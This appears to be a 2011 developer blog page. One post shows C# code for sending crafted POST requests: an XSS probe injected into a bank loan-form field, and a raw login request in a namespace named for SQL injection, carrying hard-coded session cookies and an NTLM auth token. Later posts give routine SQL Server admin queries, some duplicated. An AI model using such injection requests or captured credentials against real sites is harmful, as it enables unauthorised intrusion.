Variant 1 (using httpwebrequest)
WebRequest request = WebRequest.Create("http://10.54.40.2/New/cator/_en.php");
request.Method = "POST";
string postData = "caazaRata=&email=sample@email.tst&formCNP=&formNume=&formOras=&judet=&perioada4all=&perioadaallin1=&perioadaauto=&perioadacard=&perioadadepozit=&perioadahousing=1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e&perioadaopen=&perioadatrip=&produsSolicitat=housing1&sel2=%23&submit=Apply%20online&sumaSolicitata=&sursaLead=www.alphabank.ro&telefon=555‐666‐0606&tipFormular=&valutaCreditDorita=EUR&venitCodebitor=94102&venitSolicitant=";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentType = "application/x-www-form-urlencoded";
request.ContentLength = byteArray.Length;
Stream dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
WebResponse response = request.GetResponse();
Console.WriteLine(((HttpWebResponse)response).StatusDescription);
dataStream = response.GetResponseStream();
StreamReader reader = new StreamReader(dataStream);
string responseFromServer = reader.ReadToEnd();
Console.WriteLine(responseFromServer);
reader.Close();
dataStream.Close();
response.Close();
Variant 2 (using sockets)
using System;
using System.Text;
using System.Net;
using System.Net.Sockets;
namespace sqlInjection
{
class Program
{
static void Main(string[] args)
{
EndPoint ep = new IPEndPoint(Dns.Resolve("www.site.eu").AddressList[0], 80);
Socket sock = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
sock.Connect(ep);
sock.Send(ASCIIEncoding.ASCII.GetBytes(getRequest()), 0, getRequest().Length, SocketFlags.None);
byte[] data = new byte[10000];
int recvn = sock.Receive(data, SocketFlags.None);
sock.Disconnect(false);
string response = ASCIIEncoding.ASCII.GetString(data, 0, recvn);
Console.ReadKey();
}
public static string getRequest()
{
string request = "POST http://www.site.eu/folder/admin/login.aspx HTTP/1.1\n";
request += "Host: www.site.eu\n";
request += "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\n";
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n";
request += "Accept-Language: en-us,en;q=0.5\n";
request += "Accept-Encoding: gzip, deflate\n";
request += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
request += "Keep-Alive: 115\n";
request += "Proxy-Connection: keep-alive\n";
request += "Referer: http://www.site.eu/Content/admin/login.aspx\n";
request += "Cookie: trafic_h=02e52l03442d53c6fa09dfbd0171da9a*1297238801*site.eu*1299572237*1300086189*7; __utma=22993581.1366485220.1297952060.1306749931.1307709074.13; __utmz=22993581.1307709074.13.9.utmcsr=id-utmccn=(referral)|utmcmd=referral|utmcct=/; ASP.NET_SessionId=g4qmn155wzpp1345ejs5r345; __utmb=22993581.3.10.1307709074; __utmc=22993581\n";
request += "Proxy-Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAIIAAAAYABgAmgAAABIAEgBIAAAAEgASAFoAAAAWABYAbAAAAAAAAACyAAAABYKIogUBKAoAAAAPYQBsAHAAaABhAGIAYQBuAGsAaQBtAGkAcgBvAG4AaQBjAGEASABRAC0ATQBJAFIATwBOAEkAQwBBAK4sYYgfYm2HAAAAAAAAAAAAAAAAAAAAAFxJARrW7WqFfvMxrIO/lS7aTQDP900t0g==";
request += "Content-Type: application/x-www-form-urlencoded\n";
request += "Content-Length: 206\n";
request += "__VIEWSTATE=%2FwEPDwULLTExNTc2NTI3OTlkZOHaEH4pHAccC%2BD8297GzVyUUFRz&__EVENTVALIDATION=%2FwEWBALW1uKwCQKl1bKzCQK1qbSRCwKC3IeGDACVXRoyFUUhBYEfdeF4vyGueYuJ&txtUserName=parola&txtPassword=tdsfsd&btnLogin=Login";
return request;
}
}
}
Friday, June 10, 2011
Friday, June 3, 2011
Get modified stored procedures and tables in sql server
SELECT name, type_desc,*
FROM sys.objects
WHERE (type = 'P' or type='U' or type='V')
order by modify_date desc
FROM sys.objects
WHERE (type = 'P' or type='U' or type='V')
order by modify_date desc
Thursday, June 2, 2011
sql server - view user roles
SELECT p.NAME
,m.NAME
FROM sys.database_role_members rm
JOIN sys.database_principals p
ON rm.role_principal_id = p.principal_id
JOIN sys.database_principals m
ON rm.member_principal_id = m.principal_id
,m.NAME
FROM sys.database_role_members rm
JOIN sys.database_principals p
ON rm.role_principal_id = p.principal_id
JOIN sys.database_principals m
ON rm.member_principal_id = m.principal_id
Execute as on sql server
CREATE PROCEDURE dbo.Test
@var int
WITH EXECUTE AS 'dbo'
AS
SELECT * FROM TABLE
@var int
WITH EXECUTE AS 'dbo'
AS
SELECT * FROM TABLE
Subscribe to:
Posts (Atom)